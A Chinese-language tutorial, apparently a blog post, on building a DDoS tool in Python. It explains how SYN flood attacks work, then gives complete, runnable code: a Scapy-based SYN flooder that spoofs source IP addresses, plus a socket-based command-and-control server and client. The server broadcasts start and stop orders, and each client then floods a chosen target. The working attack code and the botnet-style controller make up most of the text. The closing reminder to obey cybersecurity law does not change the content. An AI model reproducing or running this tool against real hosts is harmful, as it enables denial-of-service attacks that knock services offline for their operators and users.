Python實現DDos攻擊
SYN泛洪攻擊
SYN泛洪攻擊
是一種比較常用的 Dos
方式之一。通過傳送大量偽造的TCP連線請求,使被攻擊主機資源耗盡(通常是CPU滿負荷或記憶體不足)的攻擊方式
我們都知道建立TCP連線需要三次握手。正常情況下客戶端首先向伺服器端傳送 SYN報文
,隨後服務端返回以 SYN
+ ACK
報文,最後客戶端向服務端傳送 ACK
報文完成三次握手

而 SYN泛洪攻擊
則是客戶端向伺服器傳送 SYN報文
之後就不再響應伺服器迴應的報文。由於伺服器在處理TCP請求時,會在協議棧留一塊緩衝區來儲存握手的過程,當然如果超過一定時間內沒有接收到客戶端的報文,本次連線在協議棧中儲存的資料將會被丟棄。攻擊者如果利用這段時間傳送大量的連線請求,全部掛起在 半連線狀態
。這樣將不斷消耗伺服器資源,直到 拒絕服務
Scapy3k基本用法
Scapy3k
其實就是 Scapy
的Python3版本,以下簡稱 Scapy
。 Scapy
是一個強大的互動式資料包處理程式。可用來發送、嗅探、解析和偽造網路資料包。在網路攻擊和滲透測試重應用非常廣泛。 Scapy
是一個獨立的程式同時還可以作為Python的第三方庫使用
首先安裝 Scapy3k
,Windows不方便,下面的操作我都是在Linux中進行的
sudo pip install scapy
執行
scapy
sudo scapy
因為
Scapy
傳送資料包需要 root
許可權,所以這裡加上 sudo
。另外執行的時候會出現一些警告資訊,因為沒有安裝相應的依賴包,不過暫時用不到,所以不用管
接下來我們用 Scapy
構造一個簡單的資料包
pkt = IP(dst = "192.168.50.10")
接下來構造 SYN
資料包,併發送出去
pkt = IP(src = "125.4.2.1",dst="192.168.50.10")/TCP(dport=80,flags="S") send(pkt)
我們構造了一個IP包和TCP包,並將它們組合到一塊,這樣就有了一個完整的TCP資料包,否則是無法傳送出去的。IP包中我們指定了源地址 src
和目的地址 dst
,其中 src
是我們偽造的地址,這也是保護攻擊者的一種方式。 flags
的值設定為 S
,說明我們要傳送的是一個 SYN
資料包。非常簡單的一段指令就夠早了一個偽造了源IP地址的 SYN
資料包

程式碼實現
現在我們要用Python以第三方庫的形式使用 Scapy
,使用方法和用互動式Shell的方式一樣
前面我們構造了 SYN
資料包,現在需要實現隨機偽造源IP地址、以及不同的源埠向目標主機發送 SYN
資料包:
import random from scapy.all import * def synFlood(tgt,dPort): srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport = dPort, flags="S") packet = ipLayer / tcpLayer send(packet)
DDos實現思路
前面我們已經實現了 SYN泛洪攻擊
,而 DDos
則是多臺主機一起發起攻擊,我們只需要能傳送命令,讓連線到伺服器的客戶端一起向同一目標發起攻擊就可以了
世界最大的黑客組織 Anonymous
經常使用 LOIC(low Orbit Ion Cannon,滴軌道離子炮)
進行大規模的 DDos
。 LOIC
有個 HIVEMIND
模式,使用者可以通過連線到一臺IRC伺服器,當有使用者傳送命令,任何以 HIVEMIND
模式連線到IRC伺服器的成員都會立即攻擊該目標
這種方式的優點事不需要傀儡機,可以有很多"志同道合"的人一起幫助你實現 DDos
,不過不太適合在傀儡機中使用。當然實現思路有很多,根據不同情況的選擇也會不同。而這裡我們將採用客戶端、伺服器的方式來實現 DDos
,這種方式非常簡單,可擴充套件性也比較強

argparse模組
由於Server端需要傳送命令去控制Client端發起攻擊,所以這裡我們先規定好命令格式
#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>
-H
後面是被攻擊主機的IP地址, -p
指定被攻擊的埠號, -c
控制攻擊的開始與停止
命令制定好了,接下來看一下如何使用命令解析庫 argparse
# Import argparse package import argparse # New ArgumentParser object parser = argparse.ArgumentParser(description="Process some integers.") # Add parameter parser.add_argument('-p', dest='port', type = int, help = 'An port number!') # Parse command line arguments args = parser.parse_args() print("Port:",args.port)
上面的程式碼中,我們建立了一個 ArgumentParser
物件, description
引數是對命令列解析的一個描述資訊,通常在我們使用 -h
命令的時候顯示。 add_argument
新增我們要解析的引數,這裡我們只添加了一個 -p
引數, dest
是通過 parse_args()
函式返回的物件中的一個屬性名稱。 type
就是解析引數的型別。 help
指定的字串是為了生成幫助資訊。 argparse
預設就支援 -h
引數,只要我們在新增引數的時候指定 help
的值就可以生成幫助資訊了
socket模組
Python中的 socket
提供了訪問BSD socket
的介面,可以非常方便的實現網路中的資訊交換。通常我們使用 socket
的時候需要指定 ip地址、埠號、協議型別
。在進行 socket
程式設計之前我們先了解一下 客戶端(Client)和伺服器(Server)
的概念。通俗的講,主動發起連線請求的稱為 客戶端
,監聽埠響應連線的稱為 伺服器
。下面我寫一個客戶端和伺服器的例子:
- 客戶端
# Import socket package import socket # Create socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Establish connection s.connect(('192.168.0.100', 7786))
上面這個例子我們首先匯入socket庫,然後建立了一個socket物件,socket物件中的引數 AF_INET
表示我們使用的是IPV4協議, SOCK_STREAM
則表示我們使用的是基於流的TCP協議。最後我們指定 ip地址
和 埠號
建立連線
- 伺服器
# Import socket package import socket cliList = [] # Create socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Specify IP & Port s.bind(('0.0.0.0', 7786)) # Strat monitor s.listen(10) while True: # Receive a new connection sock, addr = s.accept() # Add sock to the list cliList.append(sock)
伺服器的寫法比客戶端稍微複雜一些,在建立完socket之後,要繫結一個地址和埠,這裡的 0.0.0.0
表示繫結到所有的網路地址,埠號只要是沒被佔用的就可以。之後開始監聽埠,並在引數中指定最大連線數為10。最後迴圈等待新的連線,並將已連線的socket物件新增到列表中。更多相關細節可以檢視 Python官方文件
程式碼實現
Server端
由於Server端能等待Client主動連線,所以我們在Server端傳送命令,控制Client端發起 SYN泛洪攻擊
在主函式中我們建立socket,繫結所有 網路地址
和 58868
埠並開始監聽,之後我們新開一個執行緒來等待客戶端的連線,以免阻塞我們輸入命令
def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 58868)) s.listen(1024) t = Thread(target=waitConnect,args(s,)) t.start()
由於我們要給所有客戶端傳送命令,所以我們在新開的執行緒中將連線進來的socket新增到一個list中,這個稍後介紹,但在主函式中我們第一次輸入命令之前需要至少有一個客戶端連結到伺服器,所以這裡我判斷了一下 socket
的長度
print('Wait at least a client connection!') while not len(socketList): pass print('It has been a client connection!')
現在迴圈等待輸入命令,輸入之後判斷命令是否滿足命令格式的基本要求,如果滿足,就把命令傳送給所有客戶端
while True: print("=" * 50) print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start>"') # Wait for input command cmd_str = input('Please input cmd:') if len(cmd_str): if cmd_str[0] == '#': sendCmd(cmd_str)
現在程式的大體框架已經有了,接下來編寫主函式中沒有完成的子功能。首先我們應該實現等待客戶端的函式,方便開啟新的執行緒
在這個函式中,我們只需要迴圈等待客戶端的連線就可以,新連線的socket要判斷一下是否在socketList中已經儲存過了,如果沒有,就新增到socketList中
# wait connection def waitConnect(s): while True: sock, addr = s.accept() if sock not in socketList: socketList.append(socket)
我們再來實現傳送命令的函式,這個函式會遍歷socketList,將每個socket都呼叫一次send將命令傳送出去
# send command def sendCmd(cmd): print("Send command......") for sock in socketList: sock.send(cmd.encode = ('UTF-8'))
至此我們的 Server
端就完成了。新建一個檔案,將其命名為 ddosSrv.py
,向其中新增如下程式碼
import socket import argparse from threading import Thread socketList = [] # Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>' # Send command def sendCmd(cmd): print("Send command......") for sock in socketList: sock.send(cmd.encode('UTF-8')) # Wait connect def waitConnect(s): while True: sock, addr = s.accept() if sock not in socketList: socketList.append(sock) def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 58868)) s.listen(1024) t = Thread(target = waitConnect, args = (s, )) t.start() print('Wait at least a client connection!') while not len(socketList): pass print('It has been a client connection!') while True: print('=' * 50) print('The command format:"#-H xxx.xxx.xxx.xxx -p xxx -c <start>"') # Wait for input command cmd_str = input("Please input cmd:") if len(cmd_str): if cmd_str[0] == '#': sendCmd(cmd_str) if __name__ == '__main__': main()
Client端
我們將在Client端實現對主機的 SYN
泛洪攻擊,並在指令碼啟動後主動連線Server端,等待Server端傳送命令
在主函式中我們先建立 ArgumentParser()
物件,並將需要解析的命令引數新增好
def main(): p = argparse.ArgumentParser() p.add_argument('-H', dest = 'host', type = str) p.add_argument('-p', dest = 'port', type = int) p.add_argument('-c', dest = 'cmd', type = str)
現在可以建立socket,連線伺服器了。這裡為了測試,我們連線到本地的58868埠
try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.1', 58868)) print('To connected server was success!') print('=' * 50) cmdHandle(s, p) except: print('The network connected failed!') print('Please restart the script!') sys.exit(0)
我們將接受命令和處理命令定義在一個單獨的函式中。這裡我們使用一個全域性變數,用於判斷是否有程序正在發起 SYN泛洪攻擊
。之後就開始迴圈接收命令了,接收道德資料是 byte
型,我們需要對其進行解碼,解碼之後才是字串。如果接收到的資料長度為0,就跳過後續的內容,重新接收資料
# Process command def cmdHandle(sock, parser): global curProcess while True: # Receive command data = sock.recv(1024).decode('UTF-8') if len(data) == 0: print('The data is empty') continue;
如果資料長度不為0,就判斷是否具有命令基本格式的特徵 #
,滿足基本條件就需要用 ArgumentParser
物件來解析命令
if data[0] == '#': try: # Parse command options = parser.parse_args(data[1:].split()) m_host = options.host m_port = options.port m_cmd = options.cmd
命令引數解析出來後,還需要判斷到底是 start
命令還是 stop
命令。如果是 start
命令,首先要判斷當前是否有程序在執行,如果有程序判斷程序是否存活。如果當前有程序正在發起 SYN泛洪攻擊
,我們就先結束這個程序,並清空螢幕,然後再啟動一個程序,發起 SYN
泛洪攻擊
# DDos start command if m_cmd.lower() == 'start': if curProcess != None and curprocess.is_alive(): # End of process curProcess.terminate() curProcess = None os.system('clear') print('The synFlood is start') p = Process(target = synFlood, args = (m_host, m_port)) p.start() curProcess = p
如果命令是 stop
,並且有程序存活,就直接結束這個程序,並清空螢幕,否則就什麼也不做
# DDos stop command elif m_cmd.lower() == 'stop': if curProcess.is_alive(): curProcess.terminate() os.system('clear') except: print('Failed to perform the command!')
最後,新建一個檔案,命名為 ddosCli.py
,向其中新增如下程式碼
# -*- coding: utf-8 -*- import sys import socket import random import argparse from multiprocessing import Process from scapy.all import * import os isWorking = False curProcess = None # SYN flood attack def synFlood(tgt,dPort): print('='*100) print('The syn flood is running!') print('='*100) srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags="S") packet = ipLayer / tcpLayer send(packet) # Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start>' # Process command def cmdHandle(sock,parser): global curProcess while True: # Receive command data = sock.recv(1024).decode('utf-8') if len(data) == 0: print('The data is empty') return if data[0] == '#': try: # Parse command options = parser.parse_args(data[1:].split()) m_host = options.host m_port = options.port m_cmd = options.cmd # DDos start command if m_cmd.lower() == 'start': if curProcess != None and curProcess.is_alive(): curProcess.terminate() curProcess = None os.system('clear') print('The synFlood is start') p = Process(target=synFlood,args=(m_host,m_port)) p.start() curProcess = p # DDos stop command elif m_cmd.lower() =='stop': if curProcess.is_alive(): curProcess.terminate() os.system('clear') except: print('Failed to perform the command!') def main(): # Add commands that need to be parsed p = argparse.ArgumentParser() p.add_argument('-H', dest='host', type=str) p.add_argument('-p', dest='port', type=int) p.add_argument('-c', dest='cmd', type=str) print("*" * 40) try: # Create socket object s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # Connect to Server s.connect(('127.0.0.1',58868)) print('To connected server was success!') print("=" * 40) # Process command cmdHandle(s,p) except: print('The network connected failed!') print('Please restart the script!') sys.exit(0) if __name__ == '__main__': main()
程式測試
首先執行 Server端
指令碼:
sudo python3 ddosSrv.py
然後再執行 Client端
指令碼,一定要用 root
許可權執行
此時可以看到 Client端
已經提示連線成功了

Server端
也提示有一個客戶端連線了

輸入一個命令測試一下,這裡我以我自己的部落格為目標進行測試,各位請遵守網路安全法

看到 Client端
已經開始傳送資料包了,說明已經發起了 SYN泛洪攻擊